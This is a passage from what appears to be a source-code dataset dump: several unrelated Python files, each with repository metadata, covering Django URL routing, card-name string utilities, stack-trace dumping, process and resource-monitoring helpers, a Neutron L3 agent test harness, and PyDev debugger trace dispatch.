] | 60 | 2019-04-18T15:19:50.000Z | 2022-03-11T07:22:58.000Z | cv/urls.py | Haytam222/XCloud | 239115558c50f62947679dbcf01852684a3656ac | [
"MIT"
] | 11 | 2021-03-19T15:23:06.000Z | 2022-03-12T00:51:00.000Z | cv/urls.py | Haytam222/XCloud | 239115558c50f62947679dbcf01852684a3656ac | [
"MIT"
] | 23 | 2018-10-06T15:39:22.000Z | 2021-12-07T10:34:08.000Z | from django.conf.urls import url
from django.urls import path
from . import views
urlpatterns = [
path('welcome', views.welcome, name='welcome'),
path('index', views.index, name='index'),
path('mcloud', views.mcloud, name='mcloud'),
# path('mcloud/skin', views.rec_skin, name='recskin'),
# path('sdr', views.sdr, name='sdr'),
url('facesearchview', views.face_search_view, name='facesearchview'),
url('facesearch', views.face_search, name='facesearch'),
url('foodview', views.food_view, name='foodview'),
url('food', views.food, name='food'),
url('plantview', views.plant_view, name='plantview'),
url('plant', views.plant, name='plant'),
url('fbpview', views.fbp_view, name='fbpview'),
url('fbp', views.fbp, name='fbp'),
url('nsfwview', views.nsfw_view, name='nsfwview'),
url('nsfw', views.nsfw, name='nsfw'),
url('pdrview', views.pdr_view, name='pdrview'),
url('pdr', views.pdr, name='pdr'),
url('skinview', views.skin_view, name='skinview'),
url('mcloud/skin', views.rec_skin, name='recskin'),
url('detectface', views.detect_face, name='detectface'),
url('mcloud/statskin', views.stat_skin, name='statskin'),
url('cbirview', views.cbir_view, name='cbirview'),
url('cbir', views.cbir, name='cbir'),
url('deblurview', views.deblur_view, name='deblurview'),
url('deblur', views.deblur, name='deblur'),
]
| 42.545455 | 73 | 0.656695 |
ace75e8060d55679b470c7d349c6d6037f68fd4b | 1,875 | py | Python | app/card/utils.py | refaim/wots | dad9918c603293982a598fb5d6c73ade1a6080e1 | [
"MIT"
] | 2 | 2018-07-14T19:45:38.000Z | 2019-04-21T07:17:20.000Z | app/card/utils.py | refaim/wots | dad9918c603293982a598fb5d6c73ade1a6080e1 | [
"MIT"
] | 155 | 2018-07-07T00:33:31.000Z | 2021-08-16T17:55:05.000Z | app/card/utils.py | refaim/wots | dad9918c603293982a598fb5d6c73ade1a6080e1 | [
"MIT"
] | null | null | null | # coding: utf-8
import re
from abc import ABC
from typing import List
from core.utils import LangUtils, StringUtils
class CardUtils(ABC):
__UTF_TO_STD = {
'Æ': 'AE',
'│': '|',
'’': "'",
'“': '"',
'”': '"',
'«': '"',
'»': '"',
}
__STD_TO_UTF = {
"'": '’',
'AE': 'Æ',
'|': '│',
'/': '│',
}
__LANG_QUOTES = {
'EN': ('“', '”'),
'RU': ('«', '»'),
}
__DOUBLE_CARD_REGEXP = re.compile(r'\s*(\|+|\\+|/+|│+)\s*', re.UNICODE)
@classmethod
def make_key(cls, card: str) -> str:
return StringUtils.letters(cls.utf2std(card)).lower()
@classmethod
def utf2std(cls, card: str) -> str:
result = card
for k, v in cls.__UTF_TO_STD.items():
result = result.replace(k, v)
return result
@classmethod
def std2utf(cls, card: str) -> str:
result = card
num_quotes = card.count('"')
assert num_quotes == 0 or num_quotes == 2
if num_quotes == 2:
for c in cls.__LANG_QUOTES[LangUtils.guess_language(card)]:
result = result.replace('"', c, 1)
for k, v in cls.__STD_TO_UTF.items():
result = result.replace(k, v)
return result
@classmethod
def unquote(cls, card: str) -> str:
return card.replace('"', '')
@classmethod
def get_primary_name(cls, double_card: str) -> str:
return cls.split_name(double_card)[0]
@classmethod
def split_name(cls, double_card: str) -> List[str]:
parts = cls.__DOUBLE_CARD_REGEXP.split(double_card)
result = []
for i in range(0, len(parts), 2):
result.append(parts[i])
return result
@classmethod
def join_name(cls, left: str, right: str) -> str:
return '{}/{}'.format(left, right)
| 25.337838 | 75 | 0.513067 |
ace75f17188ed35012414f6465b44fb4c547c672 | 2,382 | py | Python | Tools/Builder/core/stacktracer.py | hung0913208/Base | 420b4ce8e08f9624b4e884039218ffd233b88335 | [
"BSD-3-Clause"
] | null | null | null | Tools/Builder/core/stacktracer.py | hung0913208/Base | 420b4ce8e08f9624b4e884039218ffd233b88335 | [
"BSD-3-Clause"
] | null | null | null | Tools/Builder/core/stacktracer.py | hung0913208/Base | 420b4ce8e08f9624b4e884039218ffd233b88335 | [
"BSD-3-Clause"
] | 2 | 2020-11-04T08:00:37.000Z | 2020-11-06T08:33:33.000Z | import sys
import traceback
# Taken from http://bzimmer.ziclix.com/2008/12/17/python-thread-dumps/
def stacktraces():
code = []
for threadId, stack in sys._current_frames().items():
code.append("\n# ThreadID: %s" % threadId)
for filename, lineno, name, line in traceback.extract_stack(stack):
code.append('File: "%s", line %d, in %s' % (filename, lineno, name))
if line:
code.append(" %s" % (line.strip()))
return "\n".join(code)
# This part was made by nagylzs
import os
import time
import threading
class TraceDumper(threading.Thread):
"""Dump stack traces into a given file periodically."""
def __init__(self,fpath,interval,auto):
"""
@param fpath: File path to output HTML (stack trace file)
@param auto: Set flag (True) to update trace continuously.
Clear flag (False) to update only if file not exists.
(Then delete the file to force update.)
@param interval: In seconds: how often to update the trace file.
"""
assert(interval>0.1)
self.auto = auto
self.interval = interval
self.fpath = os.path.abspath(fpath)
self.stop_requested = threading.Event()
threading.Thread.__init__(self)
def run(self):
while not self.stop_requested.isSet():
time.sleep(self.interval)
if self.auto or not os.path.isfile(self.fpath):
self.stacktraces()
def stop(self):
self.stop_requested.set()
self.join()
try:
if os.path.isfile(self.fpath):
os.unlink(self.fpath)
except:
pass
def stacktraces(self):
fout = open(self.fpath,"w+")
try:
fout.write(stacktraces())
finally:
fout.close()
_tracer = None
def start_tracer(fpath,interval=5,auto=True):
"""Start tracing into the given file."""
global _tracer
if _tracer is None:
_tracer = TraceDumper(fpath,interval,auto)
_tracer.setDaemon(True)
_tracer.start()
else:
raise Exception("Already tracing to %s"%_tracer.fpath)
def stop_tracer():
"""Stop tracing."""
global _tracer
if _tracer is None:
raise Exception("Not tracing, cannot stop.")
else:
_tracer.stop()
_tracer = None
| 29.04878 | 80 | 0.595298 |
ace75f5f08bb4abd9d25aebf65017e01f801e0fb | 20,220 | py | Python | amlb/utils/process.py | paxcema/automlbenchmark | d6835342ca0cef3f2df4d9e36fecf990f682412a | [
"MIT"
] | 4 | 2021-04-26T12:03:59.000Z | 2021-11-07T20:06:00.000Z | amlb/utils/process.py | paxcema/automlbenchmark | d6835342ca0cef3f2df4d9e36fecf990f682412a | [
"MIT"
] | null | null | null | amlb/utils/process.py | paxcema/automlbenchmark | d6835342ca0cef3f2df4d9e36fecf990f682412a | [
"MIT"
] | null | null | null | from concurrent.futures import ThreadPoolExecutor
from functools import reduce, wraps
import inspect
import io
import logging
import multiprocessing as mp
import os
import queue
import re
import select
import signal
import stat
import subprocess
import sys
import threading
import _thread
import traceback
import psutil
from .core import Namespace, as_list, flatten, fn_name
from .os import dir_of, to_mb
from .time import Timeout, Timer
log = logging.getLogger(__name__)
def run_subprocess(*popenargs,
input=None, capture_output=False, timeout=None, check=False, communicate_fn=None,
**kwargs):
"""
a clone of :function:`subprocess.run` which allows custom handling of communication
:param popenargs:
:param input:
:param capture_output:
:param timeout:
:param check:
:param communicate_fn:
:param kwargs:
:return:
"""
if input is not None:
if 'stdin' in kwargs:
raise ValueError('stdin and input arguments may not both be used.')
kwargs['stdin'] = subprocess.PIPE
if capture_output:
if kwargs.get('stdout') is not None or kwargs.get('stderr') is not None:
raise ValueError('stdout and stderr arguments may not be used '
'with capture_output.')
kwargs['stdout'] = subprocess.PIPE
kwargs['stderr'] = subprocess.PIPE
def communicate(process, input=None, timeout=None):
return (communicate_fn(process, input=input, timeout=timeout) if communicate_fn
else process.communicate(input=input, timeout=timeout))
with subprocess.Popen(*popenargs, **kwargs) as process:
try:
stdout, stderr = communicate(process, input, timeout=timeout)
except subprocess.TimeoutExpired as e:
process.kill()
if sys.platform == 'win32':
e.stdout, e.stderr = communicate(process)
else:
process.wait()
raise subprocess.TimeoutExpired(process.args, timeout, output=stdout, stderr=stderr)
except: # also handles kb interrupts
process.kill()
raise
retcode = process.poll()
if check and retcode:
raise subprocess.CalledProcessError(retcode, process.args, output=stdout, stderr=stderr)
return subprocess.CompletedProcess(process.args, retcode, stdout, stderr)
def as_cmd_args(*args, **kwargs):
return list(filter(None,
[]
+ ([] if args is None else list(args))
+ flatten(kwargs.items(), flatten_tuple=True) if kwargs is not None else []
))
def run_cmd(cmd, *args, **kwargs):
params = Namespace(
input_str=None,
capture_output=True,
capture_error=True,
bufsize=-1,
text=True,
live_output=False, # one of (True, 'line', 'block', False)
output_level=logging.DEBUG,
error_level=logging.ERROR,
shell=True,
executable=None,
env=None,
preexec_fn=None,
timeout=None,
activity_timeout=None,
)
for k, v in params:
kk = '_'+k+'_'
if kk in kwargs:
params[k] = kwargs[kk]
del kwargs[kk]
cmd_args = as_cmd_args(*args, **kwargs)
full_cmd = flatten([cmd])+cmd_args
str_cmd = ' '.join(full_cmd)
log.info("Running cmd `%s`", str_cmd)
log.debug("Running cmd `%s` with input: %s", str_cmd, params.input_str)
def live_output(process, input=None, **ignored):
mode = params.live_output
if mode is True:
mode = 'line'
if input is not None:
try:
with process.stdin as stream:
stream.write(input)
except BrokenPipeError:
pass
except:
raise
def read_pipe(pipe, timeout):
pipes = as_list(pipe)
ready, *_ = select.select(pipes, [], [], timeout)
reads = [''] * len(pipes)
for i, p in enumerate(pipes):
if p in ready:
line = p.readline()
if mode == 'line':
print(re.sub(r'\n$', '', line, count=1))
elif mode == 'block':
print(line, end='')
reads[i] = line
return reads if len(pipes) > 1 else reads[0]
output, error = zip(*iter(lambda: read_pipe([process.stdout if process.stdout else 1,
process.stderr if process.stderr else 2], params.activity_timeout),
['', '']))
print() # ensure that the log buffer is flushed at the end
return ''.join(output), ''.join(error)
try:
completed = run_subprocess(str_cmd if params.shell else full_cmd,
input=params.input_str,
timeout=params.timeout,
check=True,
communicate_fn=live_output if params.live_output and params.capture_output else None,
# stdin=subprocess.PIPE if params.input_str is not None else None,
stdout=subprocess.PIPE if params.capture_output else None,
stderr=subprocess.PIPE if params.capture_error else None,
shell=params.shell,
bufsize=params.bufsize,
universal_newlines=params.text,
executable=params.executable,
env=params.env,
preexec_fn=params.preexec_fn)
if completed.stdout:
log.log(params.output_level, completed.stdout)
if completed.stderr:
log.log(params.error_level, completed.stderr)
return completed.stdout, completed.stderr
except subprocess.CalledProcessError as e:
if e.stdout:
log.log(params.output_level, e.stdout)
if e.stderr:
log.log(params.error_level, e.stderr)
# error_tail = tail(e.stderr, 25) if e.stderr else 'Unknown Error'
# raise subprocess.SubprocessError("Error when running command `{cmd}`: {error}".format(cmd=full_cmd, error=error_tail))
raise e
def run_script(script_path, *args, **kwargs):
mod = os.stat(script_path).st_mode
os.chmod(script_path, mod | stat.S_IEXEC)
return run_cmd(script_path, *args, **kwargs)
def call_script_in_same_dir(caller_file, script_file, *args, **kwargs):
here = dir_of(caller_file)
script_path = os.path.join(here, script_file)
return run_script(script_path, *args, **kwargs)
def get_thread(tid=None):
return (threading.current_thread() if tid is None
else threading.main_thread() if tid == 0
else next(filter(lambda t: t.ident == tid, threading.enumerate())))
def get_process(pid=None):
pid = (os.getpid() if pid is None
else os.getppid() if pid == 0
else pid)
return psutil.Process(pid) if psutil.pid_exists(pid) else None
def kill_proc_tree(pid=None, include_parent=True, timeout=None, on_terminate=None):
def on_proc_terminated(proc):
log.info("Process %s terminated with exit code %s", proc, proc.returncode)
if on_terminate is not None:
on_terminate(proc)
parent = get_process(pid)
children = parent.children(recursive=True)
if include_parent:
children.append(parent)
for proc in children:
log.warning("Terminating process %s.", proc)
proc.terminate()
terminated, alive = psutil.wait_procs(children, timeout=timeout, callback=on_proc_terminated)
for proc in alive:
log.warning("Killing process %s.", proc)
proc.kill()
def call_in_subprocess(target, *args, **kwargs):
def call_target(q, *args, **kwargs):
try:
result = target(*args, **kwargs)
q.put_nowait(result)
except BaseException as e:
log.exception(e)
q.put_nowait(e)
q = mp.Queue(maxsize=1)
p = mp.Process(target=call_target, args=(q, *args), kwargs=kwargs)
try:
p.start()
p.join()
result = q.get_nowait()
if isinstance(result, BaseException):
raise result
else:
return result
except queue.Empty:
raise Exception("Subprocess running {} died abruptly.".format(target.__name__))
except BaseException:
try:
kill_proc_tree(p.pid)
except:
pass
raise
def system_cores():
return psutil.cpu_count()
def system_memory_mb():
vm = psutil.virtual_memory()
return Namespace(
total=to_mb(vm.total),
available=to_mb(vm.available),
used_percentage=vm.percent
)
def system_volume_mb(root="/"):
du = psutil.disk_usage(root)
return Namespace(
total=to_mb(du.total),
free=to_mb(du.free),
used=to_mb(du.used),
used_percentage=du.percent
)
def signal_handler(sig, handler):
"""
:param sig: a signal as defined in https://docs.python.org/3.7/library/signal.html#module-contents
:param handler: a handler function executed when the given signal is raised in the current thread.
"""
prev_handler = None
def handle(signum, frame):
try:
handler()
finally:
# restore previous signal handler
signal.signal(sig, prev_handler or signal.SIG_DFL)
prev_handler = signal.signal(sig, handle)
def raise_in_thread(thread_id, exc):
"""
:param thread_id: the thread in which the exception will be raised.
:param exc: the exception to raise in the thread: it can be an exception class or an instance.
"""
import ctypes
tid = ctypes.c_long(thread_id)
exc_class = exc if inspect.isclass(exc) else type(exc.__class__.__name__, (exc.__class__,), dict(
__init__=lambda s: super(s.__class__, s).__init__(str(exc))
))
exc_class = ctypes.py_object(exc_class)
ret = ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, exc_class)
if ret == 0:
raise ValueError(f"Nonexistent thread {thread_id}")
elif ret > 1:
ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, None)
raise SystemError(f"Failed raising exception in thread {thread_id}")
class InterruptTimeout(Timeout):
"""
A :class:`Timeout` implementation that can send a signal to the interrupted thread or process,
or raise an exception in the thread (works only for thread interruption)
if the passed signal is an exception class or instance.
"""
def __init__(self, timeout_secs, message=None, log_level=logging.WARNING,
interrupt='thread', sig=signal.SIGINT, ident=None, before_interrupt=None):
def interruption():
log.log(log_level, self.message)
if before_interrupt is not None:
before_interrupt()
if interrupt == 'thread':
if isinstance(self.sig, (type(None), BaseException)):
raise_in_thread(self.ident, TimeoutError(self.message) if self.sig is None else self.sig)
else:
# _thread.interrupt_main()
signal.pthread_kill(self.ident, self.sig)
elif interrupt == 'process':
os.kill(self.ident, self.sig)
super().__init__(timeout_secs, on_timeout=interruption)
if interrupt not in ['thread', 'process']:
raise ValueError("`interrupt` value should be one of ['thread', 'process'].")
if message is None:
desc = 'current' if ident is None else 'main' if ident == 0 else self.ident
self.message = f"Interrupting {interrupt} {desc} after {timeout_secs}s timeout."
else:
self.message = message
self.ident = get_thread(ident).ident if interrupt == 'thread' else get_process(ident).pid
self.sig = sig(self.message) if inspect.isclass(sig) and BaseException in inspect.getmro(sig) else sig
def __exit__(self, exc_type, exc_val, exc_tb):
super().__exit__(exc_type, exc_val, exc_tb)
if self.timed_out:
if isinstance(self.sig, BaseException):
raise self.sig
elif self.sig is None:
return True
class Monitoring:
def __init__(self, name=None, frequency_seconds=300, check_on_exit=False, thread_prefix="monitoring_"):
self._exec = None
self._name = name or os.getpid()
self._frequency = frequency_seconds
self._thread_prefix = thread_prefix
self._interrupt = threading.Event()
self._check_on_exit = check_on_exit
def __enter__(self):
if self._frequency > 0:
self._interrupt.clear()
self._exec = ThreadPoolExecutor(max_workers=1, thread_name_prefix=self._thread_prefix)
self._exec.submit(self._monitor)
return self
def __exit__(self, *args):
if self._exec is not None:
self._interrupt.set()
self._exec.shutdown(wait=False)
if self._check_on_exit:
self._check_state()
self._exec = None
def _monitor(self):
while not self._interrupt.is_set():
try:
self._check_state()
except Exception as e:
log.exception(e)
finally:
self._interrupt.wait(self._frequency)
def _check_state(self):
pass
class CPUMonitoring(Monitoring):
def __init__(self, name=None, frequency_seconds=300, check_on_exit=False,
use_interval=False, per_cpu=False, verbosity=0, log_level=logging.INFO):
super().__init__(name=name,
frequency_seconds=0 if use_interval else frequency_seconds,
check_on_exit=check_on_exit,
thread_prefix="cpu_monitoring_")
self._interval = frequency_seconds if use_interval else None
self._per_cpu = per_cpu
self._verbosity = verbosity
self._log_level = log_level
def _check_state(self):
if self._verbosity == 0:
percent = psutil.cpu_percent(interval=self._interval, percpu=self._per_cpu)
log.log(self._log_level, "[%s] CPU Utilization: %s%%", self._name, percent)
elif self._verbosity > 0:
percent = psutil.cpu_times_percent(interval=self._interval, percpu=self._per_cpu)
log.log(self._log_level, "[%s] CPU Utilization (in percent):\n%s", self._name, percent)
class MemoryMonitoring(Monitoring):
def __init__(self, name=None, frequency_seconds=300, check_on_exit=False,
verbosity=0, log_level=logging.INFO):
super().__init__(name=name,
frequency_seconds=frequency_seconds,
check_on_exit=check_on_exit,
thread_prefix="memory_monitoring_")
self._verbosity = verbosity
self._log_level = log_level
def _check_state(self):
if self._verbosity == 0:
percent = system_memory_mb().used_percentage
log.log(self._log_level, "[%s] Memory Usage: %s%%", self._name, percent)
elif self._verbosity == 1:
mem = system_memory_mb()
log.log(self._log_level, "[%s] Memory Usage (in MB): %s", self._name, mem)
elif self._verbosity > 1:
mem = psutil.virtual_memory()
log.log(self._log_level, "[%s] Memory Usage (in Bytes): %s",self._name, mem)
class VolumeMonitoring(Monitoring):
def __init__(self, name=None, frequency_seconds=300, check_on_exit=False, root="/",
verbosity=0, log_level=logging.INFO):
super().__init__(name=name,
frequency_seconds=frequency_seconds,
check_on_exit=check_on_exit,
thread_prefix="volume_monitoring_")
self._root = root
self._verbosity = verbosity
self._log_level = log_level
def _check_state(self):
if self._verbosity == 0:
percent = system_volume_mb(self._root).used_percentage
log.log(self._log_level, "[%s] Disk Usage: %s%%", self._name, percent)
elif self._verbosity == 1:
du = system_volume_mb(self._root)
log.log(self._log_level, "[%s] Disk Usage (in MB): %s", self._name, du)
elif self._verbosity > 1:
du = psutil.disk_usage(self._root)
log.log(self._log_level, "[%s] Disk Usage (in Bytes): %s", self._name, du)
class OSMonitoring(Monitoring):
def __init__(self, name=None, frequency_seconds=300, check_on_exit=False,
statistics=('cpu', 'memory', 'volume'), verbosity=0, log_level=logging.INFO):
super().__init__(name=name, frequency_seconds=frequency_seconds, check_on_exit=check_on_exit)
self.monitors = []
if 'cpu' in statistics:
self.monitors.append(CPUMonitoring(name=name, frequency_seconds=frequency_seconds, verbosity=verbosity, log_level=log_level))
if 'memory' in statistics:
self.monitors.append(MemoryMonitoring(name=name, frequency_seconds=frequency_seconds, verbosity=verbosity, log_level=log_level))
if 'volume' in statistics:
self.monitors.append(VolumeMonitoring(name=name, frequency_seconds=frequency_seconds, verbosity=verbosity, log_level=log_level))
def _check_state(self):
for monitor in self.monitors:
monitor._check_state()
class MemoryProfiler:
def __init__(self, process=psutil.Process(), enabled=True):
self.ps = process if enabled else None
self.before_mem = None
self.after_mem = None
def __enter__(self):
if self.ps is not None:
self.before_mem = self.ps.memory_full_info()
return self
def __exit__(self, *args):
if self.ps is not None:
self.after_mem = self.ps.memory_full_info()
def usage(self):
if self.ps is not None:
mem = self.after_mem if self.after_mem is not None else self.ps.memory_full_info()
return Namespace(
process_diff=to_mb(mem.uss-self.before_mem.uss),
process=to_mb(mem.uss),
resident_diff=to_mb(mem.rss-self.before_mem.rss),
resident=to_mb(mem.rss),
virtual_diff=to_mb(mem.vms-self.before_mem.vms),
virtual=to_mb(mem.vms)
)
def obj_size(o):
if o is None:
return 0
# handling numpy obj size (nbytes property)
return o.nbytes if hasattr(o, 'nbytes') else sys.getsizeof(o, -1)
def profile(logger=log, log_level=None, duration=True, memory=True):
def decorator(fn):
@wraps(fn)
def profiler(*args, **kwargs):
nonlocal log_level
log_level = log_level or (logging.TRACE if hasattr(logging, 'TRACE') else logging.DEBUG)
if not logger.isEnabledFor(log_level):
return fn(*args, **kwargs)
with Timer(enabled=duration) as t, MemoryProfiler(enabled=memory) as m:
ret = fn(*args, **kwargs)
name = fn_name(fn)
if duration:
logger.log(log_level, "[PROFILING] `%s` executed in %.3fs.", name, t.duration)
if memory:
ret_size = obj_size(ret)
if ret_size > 0:
logger.log(log_level, "[PROFILING] `%s` returned object size: %.3f MB.", name, to_mb(ret_size))
mem = m.usage()
logger.log(log_level, "[PROFILING] `%s` memory change; process: %+.2f MB/%.2f MB, resident: %+.2f MB/%.2f MB, virtual: %+.2f MB/%.2f MB.",
name, mem.process_diff, mem.process, mem.resident_diff, mem.resident, mem.virtual_diff, mem.virtual)
return ret
return profiler
return decorator
| 37.306273 | 154 | 0.602967 |
ace75ff3c2e47590ae2af07244fd68e5b296c172 | 3,708 | py | Python | neutron/tests/common/agents/l3_agent.py | knodir/neutron | ac4e28478ac8a8a0c9f5c5785f6a6bcf532c66b8 | [
"Apache-2.0"
] | 1 | 2018-10-19T01:48:37.000Z | 2018-10-19T01:48:37.000Z | neutron/tests/common/agents/l3_agent.py | knodir/neutron | ac4e28478ac8a8a0c9f5c5785f6a6bcf532c66b8 | [
"Apache-2.0"
] | 5 | 2019-08-14T06:46:03.000Z | 2021-12-13T20:01:25.000Z | neutron/tests/common/agents/l3_agent.py | knodir/neutron | ac4e28478ac8a8a0c9f5c5785f6a6bcf532c66b8 | [
"Apache-2.0"
] | 2 | 2020-03-15T01:24:15.000Z | 2020-07-22T20:34:26.000Z | #!/usr/bin/env python
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import sys
import types
import mock
from oslo_config import cfg
from neutron.agent.l3 import agent
from neutron.agent.l3 import namespaces
from neutron.agent import l3_agent
from neutron.common import constants
class L3NATAgentForTest(agent.L3NATAgentWithStateReport):
def __init__(self, host, conf=None):
ns_suffix = '@%s' % cfg.CONF.test_namespace_suffix
# Mock out building of namespace names
orig_build_ns_name = namespaces.build_ns_name
def build_ns_name(prefix, identifier):
return "%s%s" % (orig_build_ns_name(prefix, identifier), ns_suffix)
build_ns = mock.patch.object(namespaces, 'build_ns_name').start()
build_ns.side_effect = build_ns_name
# Mock the parsing prefix from namespace names
orig_get_prefix = namespaces.get_prefix_from_ns_name
def get_prefix_from_ns_name(ns_name):
if ns_name.endswith(ns_suffix):
return orig_get_prefix(ns_name[:-len(ns_suffix)])
parse_prefix = mock.patch.object(namespaces,
'get_prefix_from_ns_name').start()
parse_prefix.side_effect = get_prefix_from_ns_name
# Mock the parsing id from namespace names
orig_get_id = namespaces.get_id_from_ns_name
def get_id_from_ns_name(ns_name):
if ns_name.endswith(ns_suffix):
return orig_get_id(ns_name[:-len(ns_suffix)])
parse_id = mock.patch.object(namespaces, 'get_id_from_ns_name').start()
parse_id.side_effect = get_id_from_ns_name
super(L3NATAgentForTest, self).__init__(host, conf)
def _create_router(self, router_id, router):
"""Create a router with suffix added to the router namespace name.
This is needed to be able to run two agents serving the same router
on the same node.
"""
router = (
super(L3NATAgentForTest, self)._create_router(router_id, router))
router.get_internal_device_name = types.MethodType(
get_internal_device_name, router)
router.get_external_device_name = types.MethodType(
get_external_device_name, router)
return router
def _append_suffix(dev_name):
# If dev_name = 'xyz123' and the suffix is 'hostB' then the result
# will be 'xy_stB'
return '%s_%s' % (dev_name[:-4], cfg.CONF.test_namespace_suffix[-3:])
def get_internal_device_name(ri, port_id):
return _append_suffix(
(namespaces.INTERNAL_DEV_PREFIX + port_id)
[:constants.LINUX_DEV_LEN])
def get_external_device_name(ri, port_id):
return _append_suffix(
(namespaces.EXTERNAL_DEV_PREFIX + port_id)
[:constants.LINUX_DEV_LEN])
OPTS = [
cfg.StrOpt('test_namespace_suffix', default='testprefix',
help="Suffix to append to all namespace names."),
]
def register_opts(conf):
conf.register_opts(OPTS)
def main(manager='neutron.tests.common.agents.l3_agent.L3NATAgentForTest'):
register_opts(cfg.CONF)
l3_agent.main(manager=manager)
if __name__ == "__main__":
sys.exit(main())
| 32.243478 | 79 | 0.692557 |
ace760596f541a5dea7640587f44a15d7febfbce | 8,341 | py | Python | pyy1/.pycharm_helpers/pydev/_pydevd_bundle/pydevd_trace_dispatch_regular.py | pyy1988/pyy_test1 | 6bea878409e658aa87441384419be51aaab061e7 | [
"Apache-2.0"
] | null | null | null | pyy1/.pycharm_helpers/pydev/_pydevd_bundle/pydevd_trace_dispatch_regular.py | pyy1988/pyy_test1 | 6bea878409e658aa87441384419be51aaab061e7 | [
"Apache-2.0"
] | null | null | null | pyy1/.pycharm_helpers/pydev/_pydevd_bundle/pydevd_trace_dispatch_regular.py | pyy1988/pyy_test1 | 6bea878409e658aa87441384419be51aaab061e7 | [
"Apache-2.0"
] | 1 | 2019-02-06T14:50:03.000Z | 2019-02-06T14:50:03.000Z | import traceback
from _pydev_bundle.pydev_is_thread_alive import is_thread_alive
from _pydev_imps._pydev_saved_modules import threading
from _pydevd_bundle.pydevd_constants import get_thread_id
from _pydevd_bundle.pydevd_dont_trace_files import DONT_TRACE
from _pydevd_bundle.pydevd_kill_all_pydevd_threads import kill_all_pydev_threads
from pydevd_file_utils import get_abs_path_real_path_and_base_from_frame, NORM_PATHS_AND_BASE_CONTAINER
from _pydevd_bundle.pydevd_tracing import SetTrace
# IFDEF CYTHON
# # In Cython, PyDBAdditionalThreadInfo is bundled in the file.
# from cpython.object cimport PyObject
# from cpython.ref cimport Py_INCREF, Py_XDECREF
# ELSE
from _pydevd_bundle.pydevd_additional_thread_info import PyDBAdditionalThreadInfo
from _pydevd_bundle.pydevd_frame import PyDBFrame
# ENDIF
threadingCurrentThread = threading.currentThread
get_file_type = DONT_TRACE.get
# IFDEF CYTHON -- DONT EDIT THIS FILE (it is automatically generated)
# cdef dict global_cache_skips
# cdef dict global_cache_frame_skips
# ELSE
# ENDIF
# Cache where we should keep that we completely skipped entering some context.
# It needs to be invalidated when:
# - Breakpoints are changed
# It can be used when running regularly (without step over/step in/step return)
global_cache_skips = {}
global_cache_frame_skips = {}
def trace_dispatch(py_db, frame, event, arg):
t = threadingCurrentThread()
if getattr(t, 'pydev_do_not_trace', None):
return None
try:
additional_info = t.additional_info
if additional_info is None:
raise AttributeError()
except:
additional_info = t.additional_info = PyDBAdditionalThreadInfo()
thread_tracer = ThreadTracer((py_db, t, additional_info, global_cache_skips, global_cache_frame_skips))
# IFDEF CYTHON
# t._tracer = thread_tracer # Hack for cython to keep it alive while the thread is alive (just the method in the SetTrace is not enough).
# ELSE
# ENDIF
SetTrace(thread_tracer.__call__)
return thread_tracer.__call__(frame, event, arg)
# IFDEF CYTHON
# cdef class SafeCallWrapper:
# cdef method_object
# def __init__(self, method_object):
# self.method_object = method_object
# def __call__(self, *args):
# #Cannot use 'self' once inside the delegate call since we are borrowing the self reference f_trace field
# #in the frame, and that reference might get destroyed by set trace on frame and parents
# cdef PyObject* method_obj = <PyObject*> self.method_object
# Py_INCREF(<object>method_obj)
# ret = (<object>method_obj)(*args)
# Py_XDECREF (method_obj)
# return SafeCallWrapper(ret) if ret is not None else None
# cdef class ThreadTracer:
# cdef public tuple _args;
# def __init__(self, tuple args):
# self._args = args
# ELSE
class ThreadTracer:
def __init__(self, args):
self._args = args
# ENDIF
def __call__(self, frame, event, arg):
''' This is the callback used when we enter some context in the debugger.
We also decorate the thread we are in with info about the debugging.
The attributes added are:
pydev_state
pydev_step_stop
pydev_step_cmd
pydev_notify_kill
:param PyDB py_db:
This is the global debugger (this method should actually be added as a method to it).
'''
# IFDEF CYTHON
# cdef str filename;
# cdef str base;
# cdef int pydev_step_cmd;
# cdef tuple cache_key;
# cdef dict cache_skips;
# cdef bint is_stepping;
# cdef tuple abs_path_real_path_and_base;
# cdef PyDBAdditionalThreadInfo additional_info;
# ENDIF
# print('ENTER: trace_dispatch', frame.f_code.co_filename, frame.f_lineno, event, frame.f_code.co_name)
py_db, t, additional_info, cache_skips, frame_skips_cache = self._args
pydev_step_cmd = additional_info.pydev_step_cmd
is_stepping = pydev_step_cmd != -1
try:
if py_db._finish_debugging_session:
if not py_db._termination_event_set:
#that was not working very well because jython gave some socket errors
try:
if py_db.output_checker is None:
kill_all_pydev_threads()
except:
traceback.print_exc()
py_db._termination_event_set = True
return None
# if thread is not alive, cancel trace_dispatch processing
if not is_thread_alive(t):
py_db._process_thread_not_alive(get_thread_id(t))
return None # suspend tracing
try:
# Make fast path faster!
abs_path_real_path_and_base = NORM_PATHS_AND_BASE_CONTAINER[frame.f_code.co_filename]
except:
abs_path_real_path_and_base = get_abs_path_real_path_and_base_from_frame(frame)
if py_db.thread_analyser is not None:
py_db.thread_analyser.log_event(frame)
if py_db.asyncio_analyser is not None:
py_db.asyncio_analyser.log_event(frame)
filename = abs_path_real_path_and_base[1]
# Note: it's important that the context name is also given because we may hit something once
# in the global context and another in the local context.
cache_key = (frame.f_lineno, frame.f_code.co_name, filename)
if not is_stepping and cache_key in cache_skips:
# print('skipped: trace_dispatch (cache hit)', cache_key, frame.f_lineno, event, frame.f_code.co_name)
return None
file_type = get_file_type(abs_path_real_path_and_base[-1]) #we don't want to debug threading or anything related to pydevd
if file_type is not None:
if file_type == 1: # inlining LIB_FILE = 1
if py_db.not_in_scope(filename):
# print('skipped: trace_dispatch (not in scope)', abs_path_real_path_and_base[-1], frame.f_lineno, event, frame.f_code.co_name, file_type)
cache_skips[cache_key] = 1
return None
else:
# print('skipped: trace_dispatch', abs_path_real_path_and_base[-1], frame.f_lineno, event, frame.f_code.co_name, file_type)
cache_skips[cache_key] = 1
return None
if is_stepping:
if py_db.is_filter_enabled and py_db.is_ignored_by_filters(filename):
# ignore files matching stepping filters
return None
if py_db.is_filter_libraries and py_db.not_in_scope(filename):
# ignore library files while stepping
return None
